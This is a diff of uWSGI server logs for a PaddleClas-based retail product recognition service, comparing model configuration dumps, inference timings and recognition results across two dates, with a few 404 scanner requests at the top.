08:53:07 2022] GET /text4041644828787 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 45/1337] 39.99.143.235 () {32 vars in 385 bytes} [Mon Feb 14 08:53:07 2022] GET /HNAP1 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 4/1338] 39.99.143.235 () {34 vars in 411 bytes} [Mon Feb 14 08:53:07 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 90/1339] 39.99.143.235 () {32 vars in 395 bytes} [Mon Feb 14 08:53:07 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 91/1340] 39.99.143.235 () {36 vars in 463 bytes} [Mon Feb 14 08:53:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 92/1341] 39.99.143.235 () {34 vars in 414 bytes} [Mon Feb 14 08:53:19 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 05:00:02 INFO: +2022-02-14 08:54:29 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -3044,80 +5125,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 05:00:02 INFO: DetPostProcess : -2021-11-03 05:00:02 INFO: DetPreProcess : -2021-11-03 05:00:02 INFO: transform_ops : -2021-11-03 05:00:02 INFO: DetResize : -2021-11-03 05:00:02 INFO: interp : 2 -2021-11-03 05:00:02 INFO: keep_ratio : False -2021-11-03 05:00:02 INFO: target_size : [640, 640] -2021-11-03 05:00:02 INFO: DetNormalizeImage : -2021-11-03 05:00:02 INFO: is_scale : True -2021-11-03 05:00:02 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:00:02 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:00:02 INFO: DetPermute : -2021-11-03 05:00:02 INFO: Global : -2021-11-03 05:00:02 INFO: batch_size : 1 -2021-11-03 05:00:02 INFO: cpu_num_threads : 10 -2021-11-03 05:00:02 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 05:00:02 INFO: enable_benchmark : True -2021-11-03 05:00:02 INFO: enable_mkldnn : True -2021-11-03 05:00:02 INFO: enable_profile : False -2021-11-03 05:00:02 INFO: gpu_mem : 8000 -2021-11-03 05:00:02 INFO: image_shape : [3, 640, 640] -2021-11-03 05:00:02 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 05:00:02 INFO: ir_optim : True -2021-11-03 05:00:02 INFO: labe_list : ['foreground'] -2021-11-03 05:00:02 INFO: max_det_results : 5 -2021-11-03 05:00:02 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 05:00:02 INFO: rec_nms_thresold : 0.05 -2021-11-03 05:00:02 INFO: threshold : 0.2 -2021-11-03 05:00:02 INFO: use_fp16 : False -2021-11-03 05:00:02 INFO: use_gpu : False -2021-11-03 05:00:02 INFO: use_tensorrt : False -2021-11-03 05:00:02 INFO: IndexProcess : -2021-11-03 05:00:02 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 05:00:02 INFO: return_k : 5 -2021-11-03 05:00:02 INFO: score_thres : 0.5 -2021-11-03 05:00:02 INFO: RecPostProcess : None -2021-11-03 05:00:02 INFO: RecPreProcess : -2021-11-03 05:00:02 INFO: transform_ops : -2021-11-03 05:00:02 INFO: ResizeImage : -2021-11-03 05:00:02 INFO: size : 224 -2021-11-03 05:00:02 INFO: NormalizeImage : -2021-11-03 05:00:02 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:00:02 INFO: order : -2021-11-03 05:00:02 INFO: scale : 0.00392157 -2021-11-03 05:00:02 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:00:02 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2300.5378246307373 ms per batch image -[{'bbox': [54, 8, 369, 476], 'rec_docs': '江小白', 'rec_scores': 0.6193079}] -{'bbox': [54, 8, 369, 476], 'rec_docs': '江小白', 'rec_scores': 0.6193079} +2022-02-14 08:54:29 INFO: DetPostProcess : +2022-02-14 08:54:29 INFO: DetPreProcess : +2022-02-14 08:54:29 INFO: transform_ops : +2022-02-14 08:54:29 INFO: DetResize : +2022-02-14 08:54:29 INFO: interp : 2 +2022-02-14 08:54:29 INFO: keep_ratio : False +2022-02-14 08:54:29 INFO: target_size : [640, 640] +2022-02-14 08:54:29 INFO: DetNormalizeImage : +2022-02-14 08:54:29 INFO: is_scale : True +2022-02-14 08:54:29 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:54:29 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:54:29 INFO: DetPermute : +2022-02-14 08:54:29 INFO: Global : +2022-02-14 08:54:29 INFO: batch_size : 1 +2022-02-14 08:54:29 INFO: cpu_num_threads : 1 +2022-02-14 08:54:29 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:54:29 INFO: enable_benchmark : True +2022-02-14 08:54:29 INFO: enable_mkldnn : True +2022-02-14 08:54:29 INFO: enable_profile : False +2022-02-14 08:54:29 INFO: gpu_mem : 8000 +2022-02-14 08:54:29 INFO: image_shape : [3, 640, 640] +2022-02-14 08:54:29 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:54:29 INFO: ir_optim : True +2022-02-14 08:54:29 INFO: labe_list : ['foreground'] +2022-02-14 08:54:29 INFO: max_det_results : 5 +2022-02-14 08:54:29 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:54:29 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:54:29 INFO: threshold : 0.2 +2022-02-14 08:54:29 INFO: use_fp16 : False +2022-02-14 08:54:29 INFO: use_gpu : False +2022-02-14 08:54:29 INFO: use_tensorrt : False +2022-02-14 08:54:29 INFO: IndexProcess : +2022-02-14 08:54:29 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:54:29 INFO: return_k : 5 +2022-02-14 08:54:29 INFO: score_thres : 0.5 +2022-02-14 08:54:29 INFO: RecPostProcess : None +2022-02-14 08:54:29 INFO: RecPreProcess : +2022-02-14 08:54:29 INFO: transform_ops : +2022-02-14 08:54:29 INFO: ResizeImage : +2022-02-14 08:54:29 INFO: size : 224 +2022-02-14 08:54:29 INFO: NormalizeImage : +2022-02-14 08:54:29 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:54:29 INFO: order : +2022-02-14 08:54:29 INFO: scale : 0.00392157 +2022-02-14 08:54:29 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:54:29 INFO: ToCHWImage : None +Inference: 373.19421768188477 ms per batch image +[] 234 -["{'bbox': [54, 8, 369, 476], 'rec_docs': '江小白', 'rec_scores': 0.6193079}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 15/38] 210.51.42.176 () {34 vars in 430 bytes} [Wed Nov 3 05:00:01 2021] POST /reference_client/ => generated 114 bytes in 6162 msecs (HTTP/1.1 200) 5 headers in 158 bytes (8 switches on core 0) -[pid: 32765|app: 0|req: 22/39] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 05:02:11 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 16/40] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 05:02:12 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19145|app: 0|req: 18/1342] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:54:28 2022] POST 
/reference_client/ => generated 98 bytes in 2954 msecs (HTTP/1.1 200) 5 headers in 157 bytes (11 switches on core 0) req -2021-11-03 05:06:32 INFO: +2022-02-14 08:54:35 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -3127,78 +5187,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 05:06:32 INFO: DetPostProcess : -2021-11-03 05:06:32 INFO: DetPreProcess : -2021-11-03 05:06:32 INFO: transform_ops : -2021-11-03 05:06:32 INFO: DetResize : -2021-11-03 05:06:32 INFO: interp : 2 -2021-11-03 05:06:32 INFO: keep_ratio : False -2021-11-03 05:06:32 INFO: target_size : [640, 640] -2021-11-03 05:06:32 INFO: DetNormalizeImage : -2021-11-03 05:06:32 INFO: is_scale : True -2021-11-03 05:06:32 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:06:32 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:06:32 INFO: DetPermute : -2021-11-03 05:06:32 INFO: Global : -2021-11-03 05:06:32 INFO: batch_size : 1 -2021-11-03 05:06:32 INFO: cpu_num_threads : 10 -2021-11-03 05:06:32 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 05:06:32 INFO: enable_benchmark : True -2021-11-03 05:06:32 INFO: enable_mkldnn : True -2021-11-03 05:06:32 INFO: enable_profile : False -2021-11-03 05:06:32 INFO: gpu_mem : 8000 -2021-11-03 05:06:32 INFO: image_shape : [3, 640, 640] -2021-11-03 05:06:32 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 05:06:32 INFO: ir_optim : True -2021-11-03 05:06:32 INFO: labe_list : ['foreground'] -2021-11-03 05:06:32 INFO: max_det_results : 5 -2021-11-03 05:06:32 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 05:06:32 INFO: rec_nms_thresold : 0.05 -2021-11-03 
05:06:32 INFO: threshold : 0.2 -2021-11-03 05:06:32 INFO: use_fp16 : False -2021-11-03 05:06:32 INFO: use_gpu : False -2021-11-03 05:06:32 INFO: use_tensorrt : False -2021-11-03 05:06:32 INFO: IndexProcess : -2021-11-03 05:06:32 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 05:06:32 INFO: return_k : 5 -2021-11-03 05:06:32 INFO: score_thres : 0.5 -2021-11-03 05:06:32 INFO: RecPostProcess : None -2021-11-03 05:06:32 INFO: RecPreProcess : -2021-11-03 05:06:32 INFO: transform_ops : -2021-11-03 05:06:32 INFO: ResizeImage : -2021-11-03 05:06:32 INFO: size : 224 -2021-11-03 05:06:32 INFO: NormalizeImage : -2021-11-03 05:06:32 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:06:32 INFO: order : -2021-11-03 05:06:32 INFO: scale : 0.00392157 -2021-11-03 05:06:32 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:06:32 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2408.019781112671 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6413829}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6413829} +2022-02-14 08:54:35 INFO: DetPostProcess : +2022-02-14 08:54:35 INFO: DetPreProcess : +2022-02-14 08:54:35 INFO: transform_ops : +2022-02-14 08:54:35 INFO: DetResize : +2022-02-14 08:54:35 INFO: interp : 2 +2022-02-14 08:54:35 INFO: keep_ratio : False +2022-02-14 08:54:35 INFO: target_size : [640, 640] +2022-02-14 08:54:35 INFO: DetNormalizeImage : +2022-02-14 08:54:35 INFO: is_scale : True +2022-02-14 08:54:35 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:54:35 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:54:35 INFO: DetPermute : +2022-02-14 08:54:35 INFO: Global : +2022-02-14 08:54:35 INFO: batch_size : 1 +2022-02-14 08:54:35 INFO: cpu_num_threads : 1 +2022-02-14 08:54:35 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:54:35 INFO: enable_benchmark : True +2022-02-14 08:54:35 INFO: enable_mkldnn : True +2022-02-14 08:54:35 INFO: enable_profile : False +2022-02-14 08:54:35 INFO: gpu_mem : 8000 +2022-02-14 08:54:35 INFO: image_shape : [3, 640, 640] +2022-02-14 08:54:35 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:54:35 INFO: ir_optim : True +2022-02-14 08:54:35 INFO: labe_list : ['foreground'] +2022-02-14 08:54:35 INFO: max_det_results : 5 +2022-02-14 08:54:35 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:54:35 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:54:35 INFO: threshold : 0.2 +2022-02-14 08:54:35 INFO: use_fp16 : False +2022-02-14 08:54:35 INFO: use_gpu : False +2022-02-14 08:54:35 INFO: use_tensorrt : False +2022-02-14 08:54:35 INFO: IndexProcess : +2022-02-14 08:54:35 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:54:35 INFO: return_k : 5 +2022-02-14 08:54:35 INFO: score_thres : 0.5 +2022-02-14 08:54:35 INFO: RecPostProcess : None +2022-02-14 08:54:35 INFO: RecPreProcess : +2022-02-14 08:54:35 INFO: transform_ops : +2022-02-14 08:54:35 INFO: ResizeImage : +2022-02-14 08:54:35 INFO: size : 224 +2022-02-14 08:54:35 INFO: NormalizeImage : +2022-02-14 08:54:35 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:54:35 INFO: order : +2022-02-14 08:54:35 INFO: scale : 0.00392157 +2022-02-14 08:54:35 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:54:35 INFO: ToCHWImage : None +Inference: 371.631383895874 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6413829}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 23/41] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 05:06:31 2021] POST /reference_client/ => generated 114 bytes in 6344 msecs (HTTP/1.1 200) 5 headers in 158 bytes (9 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1141/1343] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:54:34 2022] POST /reference_client/ => generated 98 bytes in 2943 msecs (HTTP/1.1 200) 5 headers in 157 bytes (19 switches on core 0) req -2021-11-03 05:06:49 INFO: +2022-02-14 08:55:04 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -3208,78 +5249,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 05:06:49 INFO: DetPostProcess : -2021-11-03 05:06:49 INFO: DetPreProcess : -2021-11-03 05:06:49 INFO: transform_ops : -2021-11-03 05:06:49 INFO: DetResize : -2021-11-03 05:06:49 INFO: interp : 2 -2021-11-03 05:06:49 INFO: keep_ratio : False -2021-11-03 05:06:49 INFO: target_size : [640, 640] -2021-11-03 05:06:49 INFO: DetNormalizeImage : -2021-11-03 05:06:49 INFO: is_scale : True -2021-11-03 05:06:49 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:06:49 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:06:49 INFO: DetPermute : -2021-11-03 05:06:49 INFO: Global : -2021-11-03 05:06:49 INFO: batch_size : 1 -2021-11-03 05:06:49 INFO: cpu_num_threads : 10 -2021-11-03 05:06:49 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 05:06:49 INFO: enable_benchmark : True -2021-11-03 05:06:49 INFO: enable_mkldnn : True -2021-11-03 05:06:49 INFO: enable_profile : False -2021-11-03 05:06:49 INFO: gpu_mem : 8000 -2021-11-03 05:06:49 INFO: image_shape : [3, 640, 640] -2021-11-03 05:06:49 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 05:06:49 INFO: ir_optim : True -2021-11-03 05:06:49 INFO: labe_list : ['foreground'] -2021-11-03 05:06:49 INFO: max_det_results : 5 -2021-11-03 05:06:49 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 05:06:49 INFO: rec_nms_thresold : 0.05 -2021-11-03 05:06:49 INFO: threshold : 0.2 -2021-11-03 05:06:49 INFO: use_fp16 : False -2021-11-03 05:06:49 INFO: use_gpu : False -2021-11-03 05:06:49 INFO: use_tensorrt : False -2021-11-03 05:06:49 INFO: IndexProcess : -2021-11-03 05:06:49 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 05:06:49 INFO: return_k : 5 -2021-11-03 05:06:49 INFO: score_thres : 0.5 -2021-11-03 05:06:49 INFO: RecPostProcess : None -2021-11-03 05:06:49 INFO: RecPreProcess : -2021-11-03 05:06:49 INFO: transform_ops : -2021-11-03 05:06:49 INFO: ResizeImage : -2021-11-03 05:06:49 INFO: size : 224 -2021-11-03 05:06:49 INFO: NormalizeImage : -2021-11-03 05:06:49 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:06:49 INFO: order : -2021-11-03 05:06:49 INFO: scale : 0.00392157 -2021-11-03 05:06:49 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:06:49 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2281.2464237213135 ms per batch image -[{'bbox': [58, 165, 407, 480], 'rec_docs': '江小白', 'rec_scores': 0.5766264}] -{'bbox': [58, 165, 407, 480], 'rec_docs': '江小白', 'rec_scores': 0.5766264} +2022-02-14 08:55:04 INFO: DetPostProcess : +2022-02-14 08:55:04 INFO: DetPreProcess : +2022-02-14 08:55:04 INFO: transform_ops : +2022-02-14 08:55:04 INFO: DetResize : +2022-02-14 08:55:04 INFO: interp : 2 +2022-02-14 08:55:04 INFO: keep_ratio : False +2022-02-14 08:55:04 INFO: target_size : [640, 640] +2022-02-14 08:55:04 INFO: DetNormalizeImage : +2022-02-14 08:55:04 INFO: is_scale : True +2022-02-14 08:55:04 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:55:04 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:55:04 INFO: DetPermute : +2022-02-14 08:55:04 INFO: Global : +2022-02-14 08:55:04 INFO: batch_size : 1 +2022-02-14 08:55:04 INFO: cpu_num_threads : 1 +2022-02-14 08:55:04 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:55:04 INFO: enable_benchmark : True +2022-02-14 08:55:04 INFO: enable_mkldnn : True +2022-02-14 08:55:04 INFO: enable_profile : False +2022-02-14 08:55:04 INFO: gpu_mem : 8000 +2022-02-14 08:55:04 INFO: image_shape : [3, 640, 640] +2022-02-14 08:55:04 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:55:04 INFO: ir_optim : True +2022-02-14 08:55:04 INFO: labe_list : ['foreground'] +2022-02-14 08:55:04 INFO: max_det_results : 5 +2022-02-14 08:55:04 INFO: rec_inference_model_dir : 
/root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:55:04 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:55:04 INFO: threshold : 0.2 +2022-02-14 08:55:04 INFO: use_fp16 : False +2022-02-14 08:55:04 INFO: use_gpu : False +2022-02-14 08:55:04 INFO: use_tensorrt : False +2022-02-14 08:55:04 INFO: IndexProcess : +2022-02-14 08:55:04 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:55:04 INFO: return_k : 5 +2022-02-14 08:55:04 INFO: score_thres : 0.5 +2022-02-14 08:55:04 INFO: RecPostProcess : None +2022-02-14 08:55:04 INFO: RecPreProcess : +2022-02-14 08:55:04 INFO: transform_ops : +2022-02-14 08:55:04 INFO: ResizeImage : +2022-02-14 08:55:04 INFO: size : 224 +2022-02-14 08:55:04 INFO: NormalizeImage : +2022-02-14 08:55:04 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:55:04 INFO: order : +2022-02-14 08:55:04 INFO: scale : 0.00392157 +2022-02-14 08:55:04 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:55:04 INFO: ToCHWImage : None +Inference: 374.0994930267334 ms per batch image +[] 234 -["{'bbox': [58, 165, 407, 480], 'rec_docs': '江小白', 'rec_scores': 0.5766264}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 17/42] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 05:06:48 2021] POST /reference_client/ => generated 114 bytes in 6051 msecs (HTTP/1.1 200) 5 headers in 158 bytes (8 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1142/1344] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:55:03 2022] POST /reference_client/ => generated 98 bytes in 2951 msecs (HTTP/1.1 200) 5 headers in 157 bytes (17 switches on core 0) req -2021-11-03 05:07:07 INFO: +2022-02-14 08:59:33 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -3289,135 +5311,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 05:07:07 INFO: DetPostProcess : -2021-11-03 05:07:07 INFO: DetPreProcess : -2021-11-03 05:07:07 INFO: transform_ops : -2021-11-03 05:07:07 INFO: DetResize : -2021-11-03 05:07:07 INFO: interp : 2 -2021-11-03 05:07:07 INFO: keep_ratio : False -2021-11-03 05:07:07 INFO: target_size : [640, 640] -2021-11-03 05:07:07 INFO: DetNormalizeImage : -2021-11-03 05:07:07 INFO: is_scale : True -2021-11-03 05:07:07 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:07:07 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:07:07 INFO: DetPermute : -2021-11-03 05:07:07 INFO: Global : -2021-11-03 05:07:07 INFO: batch_size : 1 -2021-11-03 05:07:07 INFO: cpu_num_threads : 10 -2021-11-03 05:07:07 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 05:07:07 INFO: enable_benchmark : True -2021-11-03 05:07:07 INFO: enable_mkldnn : True -2021-11-03 05:07:07 INFO: enable_profile : False -2021-11-03 05:07:07 INFO: gpu_mem : 8000 -2021-11-03 05:07:07 INFO: image_shape : [3, 640, 640] -2021-11-03 05:07:07 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 05:07:07 INFO: ir_optim : True -2021-11-03 05:07:07 INFO: labe_list : ['foreground'] -2021-11-03 05:07:07 INFO: max_det_results : 5 -2021-11-03 05:07:07 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 05:07:07 INFO: rec_nms_thresold : 0.05 -2021-11-03 05:07:07 INFO: threshold : 0.2 -2021-11-03 05:07:07 INFO: use_fp16 : False -2021-11-03 05:07:07 INFO: use_gpu : False -2021-11-03 05:07:07 INFO: use_tensorrt : False -2021-11-03 05:07:07 INFO: IndexProcess : -2021-11-03 05:07:07 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 05:07:07 INFO: return_k : 5 -2021-11-03 05:07:07 INFO: score_thres : 0.5 -2021-11-03 05:07:07 INFO: RecPostProcess : None -2021-11-03 05:07:07 INFO: RecPreProcess : -2021-11-03 05:07:07 INFO: transform_ops : -2021-11-03 05:07:07 INFO: ResizeImage : -2021-11-03 05:07:07 INFO: size : 224 -2021-11-03 05:07:07 INFO: NormalizeImage : -2021-11-03 05:07:07 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 05:07:07 INFO: order : -2021-11-03 05:07:07 INFO: scale : 0.00392157 -2021-11-03 05:07:07 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 05:07:07 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2486.5872859954834 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5730278}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.5730278} +2022-02-14 08:59:33 INFO: DetPostProcess : +2022-02-14 08:59:33 INFO: DetPreProcess : +2022-02-14 08:59:33 INFO: transform_ops : +2022-02-14 08:59:33 INFO: DetResize : +2022-02-14 08:59:33 INFO: interp : 2 +2022-02-14 08:59:33 INFO: keep_ratio : False +2022-02-14 08:59:33 INFO: target_size : [640, 640] +2022-02-14 08:59:33 INFO: DetNormalizeImage : +2022-02-14 08:59:33 INFO: is_scale : True +2022-02-14 08:59:33 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:59:33 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:59:33 INFO: DetPermute : +2022-02-14 08:59:33 INFO: Global : +2022-02-14 08:59:33 INFO: batch_size : 1 +2022-02-14 08:59:33 INFO: cpu_num_threads : 1 +2022-02-14 08:59:33 